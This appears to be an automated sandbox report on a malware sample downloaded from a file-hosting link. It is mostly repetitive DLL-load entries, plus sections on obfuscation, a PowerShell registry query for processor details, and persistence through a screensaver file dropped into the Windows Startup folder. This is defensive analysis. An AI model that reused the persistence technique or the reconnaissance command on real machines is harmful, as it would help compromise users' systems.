            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
            Source: C:\Windows\System32\wbem\WMIC.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
            Source: https___files.catbox.moe_l2rczc.pif.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: https___files.catbox.moe_l2rczc.pif.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: https___files.catbox.moe_l2rczc.pif.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

            Data Obfuscation

            barindex
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIERJump to behavior
            Source: https___files.catbox.moe_l2rczc.pif.exeStatic PE information: 0xF5959D04 [Sun Jul 25 18:23:00 2100 UTC]
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeCode function: 0_2_00007FF887D26BA4 push ebp; iretd 0_2_00007FF887D26CD1
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeCode function: 0_2_00007FF887D249D0 push esi; retf 5F58h0_2_00007FF887D25A37
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeCode function: 0_2_00007FF887D25994 push esi; retf 5F58h0_2_00007FF887D25A37
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeCode function: 0_2_00007FF887D278DA push eax; ret 0_2_00007FF887D278DD
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeCode function: 0_2_00007FF887D100BD pushad ; iretd 0_2_00007FF887D100C1
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeCode function: 0_2_00007FF887D2AF98 pushfd ; ret 0_2_00007FF887D76191
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeCode function: 0_2_00007FF887D10D32 push eax; retn 87C0h0_2_00007FF887D10E11
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeCode function: 0_2_00007FF887D2450F push esi; iretd 0_2_00007FF887D24511
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeCode function: 0_2_00007FF887D244F7 push edi; iretd 0_2_00007FF887D244F8
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeCode function: 0_2_00007FF887D26CA6 push ebp; iretd 0_2_00007FF887D26CD1
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeCode function: 0_2_00007FF887D293F7 push es; iretd 0_2_00007FF887D293F8
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeCode function: 0_2_00007FF887D27BA6 push esi; ret 0_2_00007FF887D27BA7
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeCode function: 0_2_00007FF887D23B30 pushad ; iretd 0_2_00007FF887D23B31
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeCode function: 0_2_00007FF887D252FD push esi; retf 0_2_00007FF887D252FE
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeCode function: 0_2_00007FF887D25306 push esi; retf 0_2_00007FF887D2530F
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeCode function: 0_2_00007FF887D26B09 push edi; iretd 0_2_00007FF887D26B0A
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeCode function: 0_2_00007FF887D2426D push edi; iretd 0_2_00007FF887D24273
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeCode function: 0_2_00007FF887EDD555 push eax; retf 0_2_00007FF887EDD591
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF887C2D2A5 pushad ; iretd 2_2_00007FF887C2D2A6
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF887E12316 push 8B485F91h; iretd 2_2_00007FF887E1231B
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 18_2_00007FF887D28202 push ebp; retf 18_2_00007FF887D282A8

            Persistence and Installation Behavior

            barindex
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\TqmmU.scrJump to dropped file
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\TqmmU.scrJump to dropped file
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\TqmmU.scrJump to dropped file

            Boot Survival

            barindex
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\TqmmU.scrJump to dropped file
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\TqmmU.scrJump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\TqmmU.scrJump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\TqmmU.scr\:Zone.Identifier:$DATAJump to behavior

            Hooking and other Techniques for Hiding and Protection

            barindex
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
